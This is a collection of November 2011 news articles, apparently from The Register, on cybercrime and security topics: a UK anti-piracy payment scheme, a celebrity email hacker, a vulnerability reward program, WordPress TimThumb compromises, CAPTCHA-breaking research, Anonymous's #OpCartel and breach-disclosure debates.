STE WILLIAMS

The UK’s regulator of premium rate services (PRS) will pass on details of copyright infringing websites to service providers under a new “proactive” arrangement with police and music industry representatives, it has announced.

PhonepayPlus said that PRS providers notified of copyright infringing sites could be charged under the Proceeds of Crime Act (POCA) if they then subsequently made “arrangements” with operators of the illicit sites to help users pay for the pirated music.

“It is important to note that, if any provider has been put on notice that a service is illegal and either continues to provide, or subsequently provides, payment services to, or for, the site(s) in question, the provider may be criminally liable under Section 328 of the Proceeds of Crime Act,” the regulator said in a notice to PRS providers. Under POCA a person is generally guilty of an offence if they enter into or become concerned in arrangements they know or suspect “facilitate (by whatever means) the acquisition, retention, use or control of criminal property by or on behalf of another person”.

Under the new notification scheme the City of London Police (CoLP) and the International Federation of the Phonographic Industry (IFPI) will inform PhonepayPlus of “any promotional material, including but not limited to websites” that is suspected of offering illegally copied music to be downloaded through “premium rate means”, the regulator said. The information will then be passed on to individual PRS providers “to ensure they are aware of the potential risks of contracting with clients associated with such promotional material,” it said.

To date PhonepayPlus has received notice of 24 infringing websites and police are currently investigating 38 other “unlicensed services”, the regulator said.

PhonepayPlus said it was taking the “proactive” step to notify providers of potential infringers because of the “risk” that copyright infringers would try to sell pirated music through PRS. It said Visa, Mastercard and PayPal were already working with CoLP and IFPI to prevent the sale of illegal content through their services.

“Until relatively recently, pirated music downloads were almost exclusively paid for by consumers using credit cards,” PhonepayPlus said.

“However, following discussions between IFPI and CoLP and providers of credit card services, credit card companies have begun to identify and exclude merchants offering pirated music. There is therefore a risk that those who still intend to offer pirated music may now turn to PRS as a quick and easily accessible form of payment. While there is little evidence at present of pirated music being offered using PRS, PhonepayPlus has agreed to work proactively with the IFPI and the CoLP in order to prevent potentially criminal activity damaging the ongoing reputation of the overall PRS market,” the regulator said.

Claire Smith, copyright law expert at Pinsent Masons, the law firm behind Out-Law.com, said that owners of copyrighted music could also sue some companies involved in operating PRS if those firms do not prevent customers paying for copyright-infringing content that they have been notified about under the UK’s E-Commerce Regulations.

Under the Regulations a service provider is generally not liable for any copyright-infringing material accessed by users of its service if it “acts as a mere conduit, caches the material, or hosts the material”.

Next page: How to stay out of trouble

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/03/prs_copyright/

A Florida man has pleaded not guilty to charges he broke into the email accounts of actresses Scarlett Johansson and Mila Kunis, and as many as 50 other celebrities, and made off with nude photos and personal information.

Christopher Chaney, 35, of Jacksonville, Florida, denied the allegations contained in a 26-count indictment filed last month during his first court appearance on Tuesday in California, where the charges were filed. US Magistrate Judge Patrick Walsh increased Chaney’s bail to $110,000 from $10,000 after prosecutors presented evidence he may have stalked three additional victims, including a 13-year-old girl.

Chaney’s denial came after he publicly apologized for the crime during a television news segment broadcast by Jacksonville, Florida, television station WAWS.

“It started as curiosity and it turned to just being addictive,” Chaney said in front of a video camera. “Seeing the behind-the-scenes of what’s going on with the people you see on the big screen. I was almost relieved when they came in and took the computers inside.”

Indeed, even after federal investigators seized the Chaney’s computer in February, the defendant continued his hacking scheme against an unnamed actress for six more months, the Associated Press reported, citing a prosecutor in the case.

“We have great concern that he can’t stop himself,” the news service quoted US Attorney Lisa Feldman as saying.

According to federal prosecutors, Chaney obtained personal information about his victims and used it to breach the email accounts of more than 50 individuals in the entertainment world. Other celebrities allegedly targeted by Chaney included pop singer Christina Aguilera, actress Renee Olstead, and fashion designer Simone Harouche. Nude pictures he lifted from Johansson’s account eventually were published on gossip sites, prompting a federal investigation.

After Chaney accessed the accounts hosted by Apple, Google and Yahoo, he activated their forwarding feature, allowing him to transfer new messages instantaneously to a separate account he controlled.

The AP also cited search warrants and other evidence that suggested Chaney may have stalked the online activities of three other people. One possible victim was a 13-year-old girl, and the other is a Connecticut woman who allegedly was surveilled for the past 12 years.

Chaney’s attorney told the AP the new allegations are completely false.

In a brief article published Tuesday by Vanity Fair, Johansson showed no regrets for snapping nude photos of herself and storing them on an internet-facing account.

“I know my best angles,” she said. “They were sent to my husband. There’s nothing wrong with that. It’s not like I was shooting a porno.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/scarlett_johansson_hacker_denial/

Secunia has launched yet another vulnerability rewards program, the Secunia Vulnerability Coordination Reward Program, which it says is designed to operate independently of particular software vendors.

The company says the idea is to make life easier for researchers, by concentrating vulnerability reporting to a single entity, rather than leaving them to deal with multiple vendors’ reporting procedures and rewards programs.

Vendor programs, the company says, have a “business model wrapped around them,” and therefore can be selective in which bugs win a bounty. The Secunia program will accept any vulnerability in off-the-shelf software.

In its blog post, Secunia’s Carsten Eiram says the “fun part” of research is in discovering a vulnerability or exploit, rather than in the “sometimes extensive coordination and liaison” with vendors.

Under this program, he says, Secunia will “both confirm vulnerability discoveries and handle the coordination process”.

The service could also fill a gap, the company says, for researchers who don’t wish to sell their vulnerabilities, or don’t want to constrain their research to those bugs that happen to fit “the requirements of existing initiatives”.

Rather than cash, Secunia’s rewards will include merchandise and two “major annual rewards” for hotel accommodation and entry to major security conferences.

The program’s criteria are that the vulnerability affects a stable product; it affects the latest version of the product; the product has active vendor support; the vulnerability is not already public; and Secunia can replicate the vulnerability. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/secunia_vulnerability_rewards/

Vladuz, the Romanian hacker who repeatedly accessed off-limits parts of eBay’s website and then publicly taunted company officials over the security lapses, has been handed a suspended three-year sentence, according to news reports.

The Bucharest appeal court issued the sentence on Wednesday to 23-year-old Vlad Duiculescu, AFP reported. He was arrested in Romania in 2008, with help from US Secret Service agents, after eBay said his exploits caused at least $1 million in damage. He was imprisoned for almost two years before being released last year.

From 2005 to 2007, Duiculescu adopted the moniker Vladuz and repeatedly breached eBay security by accessing parts of the website reserved for company employees. In March 2007, he secured credentials that allowed him to masquerade as an eBay official on company forums, one of which was related to trust and safety. It was at least the third time in as many months he had intruded into restricted sections of the website. The string of attacks fueled suspicions that hackers had gained backdoor access to the site.

The lapses were an embarrassment to eBay officials as they worked to assure customers that the site was secure, but there never was any proof the site was susceptible to a backdoor. It’s not clear what Duiculescu did to cause more than $1 million in damage. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/03/ebay_hacker_sentenced/

Mass attacks that exploit a known vulnerability in the WordPress publishing platform have continued to bear fruit for hackers, with thousands of websites claimed in the past few weeks, a researcher said.

The security bug, in a widely used image resizing utility known as TimThumb, allows attackers to seize control of WordPress websites, one of the victims warned nine weeks ago. A few days later, a security researcher found almost 4,400 WordPress sites had been commandeered in an attack that poisoned Google Image results with sites that attempted to trick users into installing counterfeit antivirus software. He speculated the cause was the same TimThumb exploit.

Although a fix for the TimThumb vulnerability has been available for more than two months, plenty of websites remain vulnerable. According to a research report published by Avast on Monday, thousands of websites have been infected by Black Hole, a hack-by-numbers toolkit available in underground forums for about $1,500 or for free for a scaled-down version. The kit installs an iframe in infected sites that silently redirects visitors to malicious sites.

“The bad guys are using a security vulnerability in non-updated TimThumb,” Avast researcher Jan Sirmer wrote. “This allows attackers to upload and execute arbitrary PHP code in the TimThumb cache directory which will download other malicious files.”

Avast alone blocked the redirection attempts from 3,500 unique websites in August and 2,515 sites last month, and Sirmer said he expects to see similar results this month. That may be only a small percentage of the total number of infected sites, since Avast is used by a small minority of people browsing the web. Sirmer said attackers may have compromised some of the websites by exploiting weak passwords.

Once a site is infected, it’s not always easy to remove all the malicious code. Denis Sinegubko, the Russian researcher who discovered the WordPress attack used to poison Google Image results, has advised webmasters of compromised sites to look for rogue rules in the .htaccess files in the site root and above the site root directory. He has more here. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/wordpress_mass_compromise/

Security researchers have discovered the vast majority of text-based anti-spam tests are easily defeated.

Computer scientists from Stanford University discovered 13 of 15 CAPTCHA schemes from popular websites were vulnerable to automated attacks. The CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) has been used for several years to prevent automated sign-ups to webmail accounts or online forums in order to block spam bots. Surfers are typically asked during a registration process to identify distorted letters as depicted in an image. A variety of other approaches – including pictures of cats, audio clips and calculus puzzles – have been applied to the problem over the years.

Cybercrooks have responded to the challenge posed by CAPTCHAs by devising techniques that typically involve semi-automatically signing up for new accounts, while relying on the human cogs in 21st century sweatshops – typically located in India – to solve the CAPTCHA puzzles themselves.

The Stanford team, by contrast, looked at whether it was possible to fully automate the process of breaking CAPTCHAs. Their techniques including removing deliberately introduced image background noise and breaking text strings into single characters for easier recognition. The team built an automated tool, called Decaptcha, that applied these various tricks. The approach was partially inspired by techniques used to orientate robots in unknown environments.

Decaptcha was turned against the challenge response CAPTCHAs used by 15 high-profile websites, enjoying excellent bowling figures against the majority.

For example, Visa’s Authorize.net payment gateway CAPTCHA was defeated 66 per cent of the time. eBay’s CAPTCHA was sidestepped 43 per cent of the time. Lower, but still workable, bypass rates were achieved against Wikipedia, Digg and CNN.

Google and reCAPTCHA were the only two CAPTCHA systems that consistently thwarted Decaptcha during the tests.

Authorize.net and Digg have both switched to reCAPTCHA since these tests were run, Computerworld adds.

In a research paper (PDF), the Stanford team suggest several approaches towards making CAPTCHAs harder to beat, including making the length of a text string changeable and randomising character font and size. Lines in the background of CAPTCHAs might also prove effective. In addition, the Stanford team highlighted features that are ineffective against automated attacks but may counter the activities of humans.

The researchers, Elie Bursztein, Matthieu Martin and John C Mitchel, who previously developed techniques for breaking audio CAPTCHAs, presented their latest research at the recent ACM Conference On Computer and Communication Security in Chicago. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/popular_captchas_easily_defeated/

Plans by Anonymous to expose members and associates of a Mexican drug cartel have reportedly been abandoned, at least locally, amid doubts whether a member of the hacking collective was ever really kidnapped by the group.

In an ultimatum posted on YouTube on 6 October (and much later in English), Anonymous threatened to publish data on cartel members and affiliates in Veracruz unless an unnamed male kidnap victim was released by 5 November. The kidnapping supposedly happened during a street protest in the Mexican state of Veracruz or a leafleting campaign (reports vary). The hackers threatened to expose journalists, taxi drivers and corrupt cops that have collaborated with the cartel.

Los Zetas – a ruthless gang of drug traffickers known for kidnap, mass murder and hanging bloggers by their own intestines – reportedly responded to the ultimatum by hiring computer experts to track down individuals involved in the online anti-cartel campaign, dubbed #OpCartel.

Two self-identified OpCartel participants, Skill3r and Glyniss Paroubek, told Mexican newspaper Milenio on Sunday that the operation had been abandoned (following an internal debate) as “too risky” because it placed even those outside the hacker group in danger.

This might be just as well because security analysts warned that if Anonymous exposed details of the Zetas’ operations this would almost certainly result in further bloodshed. Outing cartel members would act as a motive for reprisal attacks against bloggers. Meanwhile rival gangs might target those named on the list, regardless of its authenticity or accuracy.

“If Anonymous is able to increase the effectiveness of online operations seeking to expose cartel activities then that makes them and other anti-cartel bloggers in Mexico much higher profile targets than before,” security analyst firm Stratfor warns.

“We have seen reports that Los Zetas are deploying their own teams of computer experts to track those individuals involved in the online anti-cartel campaign, which indicates that the criminal group is taking the campaign very seriously. Those individuals involved face the risk of abduction, injury and death — judging by how Los Zetas has dealt with threats in the past,” it adds.

Anonymous members in the English-speaking world may still continue the campaign to release the details of Los Zetas collaborators, even without the involvement of their compadres in Mexico. Notorious Anonymous hacker Sabu, for example, tweeted: “# OpCartel is more alive than ever and as I told others in private, the war against corruption is on both sides of the spectrum. We are going to WAR!”

Conflicting statements from within the Anonymous camp have prompted the re-examination of #OpCartel more generally. Many have begun questioning whether an Anonymous member was ever kidnapped in Veracruz, the Guardian reports. For one thing issuing an ultimatum demanding the release of an unnamed person makes no sense. And why isn’t there any mention of a date of the supposed kidnapping or police reports of a missing person associated with PaperStorm, the Anonymous-organised event in December and March, referenced in the YouTube videos?

Some have begun describing the kidnapping pretext – if not Operation Cartel itself – as a hoax.

Purported organisers of #OpCartel posted on the website called Anonymous IberoAmerica. “The Anonymous IberoAmerica site is now soliciting anonymous tips on cartel collaborators,” the Guardian concludes. “That suggests that, if the promised revelations materialise, they could be nothing more than common rumours or gossip sent in by tipsters or foes of those named.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/anonymous_retreats_from_operation_cartel/

A Palestinian minister is blaming foreign hackers for taking out internet services and servers in the West Bank and Gaza.

Palestinian communications minister Mashur Abu Daqqa blames the Israeli state for what is describes as a coordinated DDoS attack against core communication systems.

“Since this morning all Palestinian IP addresses have come under attack from places across the world,” the minister told AFP on Tuesday. “I think from the manner of the attack and its intensity that there is a state behind it, and it is not spontaneous.

“Israel could be involved as it announced yesterday that it was considering the kind of sanctions it would impose on us.”

The disruption comes a day after the United Nations Educational, Scientific and Cultural Organisation voted to admit Palestine as a member of the group, a move that went down badly in Israel, the Washington Post adds.

Abu Daqqa said the Palestinian banking system had been isolated from the attack, a claim that is yet to be independently confirmed.

Conflict in cyberspace is one aspect of a propaganda battle that has accompanied the decades-long Israeli-Palestinian conflict. Routinely this involves defacing websites of one side or the other but sometimes slightly more sophisticated tactics are brought into play. For example, Israeli cyberactivists have invited pro-Israeli surfers to install a tool that attacks websites associated with Hamas in the past. Hamas has controlled Gaza since June 2007. Its rival Fatah controls the West Bank. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/palestinian_net_attack/

LCC System administrators should be the detectives in cyber investigations, a top Microsoft security bod said.

It wasn’t helpful for cops to go blundering into companies’ networks to look for evidence in cybercrimes, because the sysadmin will know where to look for that information, said Scott Charney, VP of trustworthy computing group at MS.

“The evidence you need to investigate cybercrime is often in the hands of the private sector… and in these cases, the sysadmin becomes lead investigator in the cybercrime case,” he said.

Charney, who was previously chief of the Computer Crime and Intellectual Property Section for the US Justice Department, said that companies often didn’t want to collaborate with government investigations because they were afraid they’d have to open up their networks. But in reality, it was better for the firm’s IT staff, who know the network, to search for the evidence, he said.

In the great anonymity versus accountability debate, Charney argued that what was needed was a bit of both.

“What increasing became clear [in my career] is that you had to ask the question at one level up. Do you want anonymity or accountability in certain things on the net?” he said. “For internet banking – we want robust authentication. But if I’m engaged in certain kinds of speech I may want anonymity and society should support that anonymity.”

“The reason for anonymity is that it protects important values like free speech… and things we want to support as human rights. On the other hand, criminals do bad things so you want accountability,” he added.

Charney also said that everyone already knows what to do about cybercrime, but getting it done was the problem.

“Strategically we know what to do but tactically it’s hard,” he said. “What we need to do is harmonise national laws and build capability in countries all over the world and then you need to establish 24/7 contacts so that you can access knowledgeable people in any country at any time so that you can at least freeze the info you need before it’s gone… and then find a quick way to get that information to the agency that needs it.”

Charney was speaking at the London Conference on Cyberspace (LCC), which is hosting debates on issues like cyber security, cybercrime, the digital divide and internet freedoms. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/sys_admins_should_help_cybercrime_probes/

LCC Businesses need to ‘fess up when they’ve been the victims of cyber attacks, experts at the London Conference on Cyberspace (LCC) said today.

Government and biz bosses said that even though companies didn’t really want to own up to having been breached, they needed to start sharing information with officials to protect critical infrastructures.

Erik Akerboom, president of the Cyber Security Council in the Netherlands, said that his government needed to know about the DigiNotar hack when it happened, not later on.

“We needed information at the time that DigiNotar was hacked; it was hacked in June but we didn’t find out then,” he said.

Digital certificate firm DigiNotar was hacked in June this year and forged Google.com SSL credentials were then used to spy on 300,000 Iranian internet users. The incident was notorious over the summer when it was discovered that the firm’s security was wholly inadequate, and because it took so long for the company to come clean.

DigiNotar only started to revoke certificates in mid-July, and didn’t go public with the security issue until August. The company subsequently filed for bankruptcy, having lost all the trust its business relied upon.

Akerboom said that the Netherlands was considering making it compulsory for firms to inform the government when their networks were attacked, but the government would then keep the information confidential to protect the companies’ business.

Matthew Kirk, group external affairs director at Vodafone, said it would be tough to make businesses disclose attacks without a better trust relationship between companies and governments.

“Our instinct as a company is much more self-regulation rather than compulsory on almost everything. But I think there’s a critical role for government, which is not so much compulsion but creating… trust,” he said.

“I think it needs to be done in an atmosphere where it’s actually in the companies’ interest to disclose,” he added.

Harry van Dorenmalen, chairman of IBM Europe and also a member of the National Security Council in the Netherlands, was more forceful about what should be expected of the private sector.

“I think the private sector in general needs to step up much more than they do,” he said, adding that if businesses found it difficult to go to the government individually, they should consider presenting issues to the government through business groups.

“That’s an appeal to the private sector to step up, be vocal and be connected,” he said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2011/11/02/business_need_to_confess_cyber_attacks/